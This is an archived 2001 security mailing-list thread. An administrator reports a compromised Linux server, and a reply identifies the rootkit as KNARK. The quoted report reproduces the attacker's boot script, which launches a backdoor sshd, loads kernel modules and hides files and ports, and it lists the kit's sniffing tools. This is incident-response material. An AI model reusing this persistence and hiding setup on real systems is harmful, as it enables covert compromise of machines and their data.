Security Incidents mailing list archives
Re: Cracked. Possible(?) new rootkit ?
From: Michael Witt <bravens1 () earthlink net>
Date: Wed, 14 Feb 2001 19:40:00 -0500
Greetings, The rootkit you found is called KNARK. KNARK is a first generation kernel rootkit that is designed to exclusively exploit the LINUX 2.2 kernel. Not only is Tripwire ineffective against this rootkit, but the standard practice of using "good binaries" on a floppy or CD is unsuccessful as well. Since the kernel itself is rootkitted, the kernel always use it's binaries vice the binaries that are valid located on a floppy or CD. The kernel rootkits were described at both the 2000 FIRST and 2000 Blackhat Conferences as "game over" if they get installed because of the immense difficulty in identifying that a system has actually had the kernel rootkit installed. Impact: KNARK will allow the intruder to continue to operate in stealth mode. This kernel rootkit also installs a tool that allows the rootkit to move files/data from the compromised system through a backdoor. More information concerning KNARK and KMOD (Solaris kernel rootkit) and the rootkits themselves can be found the following website: www.gothacked.net Mike Witt Riptech, Inc. ----- Original Message ----- From: "maarten van den Berg" <maarten () VBVB NL> To: <INCIDENTS () SECURITYFOCUS COM> Sent: Wednesday, February 14, 2001 10:21 AM Subject: Cracked. Possible(?) new rootkit ?
Hi Maybe I'm mistaken and this is old stuff, but... I recently found a box which was obviously cracked, at least all the evidence definitely points that way...: After a (kernel-)upgrade, some service led to crashing the whole machine. The service in question was called "system", and this is what /etc/rc.d/rc3.d/S99system looks like: _____ cut here ______ #!/bin/sh # # This script will be executed *after* all the other init scripts. # You can put your own initialization stuff in here if you don't # want to do the full Sys V style init stuff. /var/kerb/ssh.d > /dev/null 2> /dev/null /sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null /sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null /bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null #exec redir #/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd /var/kerb/nethide ":1F98" > /dev/null 2> /dev/null /var/kerb/nethide ":1F91" > /dev/null 2> /dev/null /var/kerb/nethide ":1F92" > /dev/null 2> /dev/null #/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null /var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null /var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null /var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null _____ cut here _____ Judging just from the file, an alternative sshd (ssh.d) is started, two kernel-modules are inserted, a binary hides certain strings in something network-related, and a binary 'hidef' hides everything including itself. I have not had time yet to do any more research, but I bet it was just pure luck that this toolkit didn't function well under a new kernel, thus exposing itself... I know what to do now, reinstall from scratch, but I was wondering if this is interesting stuff for the list, or that it is merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with a well-known rootkit etc. Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that didn't detect anything, running or otherwise. Maarten _____ Listing of /var/kerb/ _____ drwxr-xr-x root/ftp 0 2000-07-27 21:40:46 kerb/ drwxr-xr-x root/root 0 2000-07-12 03:43:50 kerb/s/ -rwxr-xr-x root/root 129076 2000-07-12 03:20:11 kerb/s/dsniff -rwxr-xr-x root/root 20100 2000-07-12 03:20:16 kerb/s/arpredirect -rw-r--r-- root/root 1009 2000-07-12 03:43:50 kerb/s/dsniff.services -rwxr-xr-x root/root 93580 2000-07-12 03:26:17 kerb/s/urlsnarf -rwxr-xr-x root/ftp 13468 2000-07-12 08:29:59 kerb/ered -rwxr-xr-x root/ftp 3984 2000-07-12 08:29:59 kerb/hidef -rw-r--r-- root/ftp 537 2000-07-12 08:29:59 kerb/k.a -rwxr-xr-x root/ftp 35016 2000-07-12 08:29:59 kerb/l -rwxr-xr-x root/ftp 13036 2000-07-12 08:29:59 kerb/nethide -rwxr-xr-x root/ftp 27896 2000-07-12 08:29:59 kerb/p -rwxr-xr-x root/ftp 8128 2000-07-12 08:29:59 kerb/pidof -rw------- root/ftp 512 2001-02-14 16:01:40 kerb/sd.a -rwxr-xr-x root/ftp 196408 2000-07-12 08:29:59 kerb/ssh.d -rw-r--r-- root/ftp 960 2000-07-12 08:29:59 kerb/supermd.o -rw-r--r-- root/ftp 12292 2000-07-12 08:29:59 kerb/supernw.o _____ end of listing _____
Current thread:
- Cracked. Possible(?) new rootkit ? maarten van den Berg (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Jeremy Hanmer (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Ryan Hilton (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Michael Witt (Feb 14)
- Re: Cracked. Possible(?) new rootkit ? Jeremy Hanmer (Feb 14)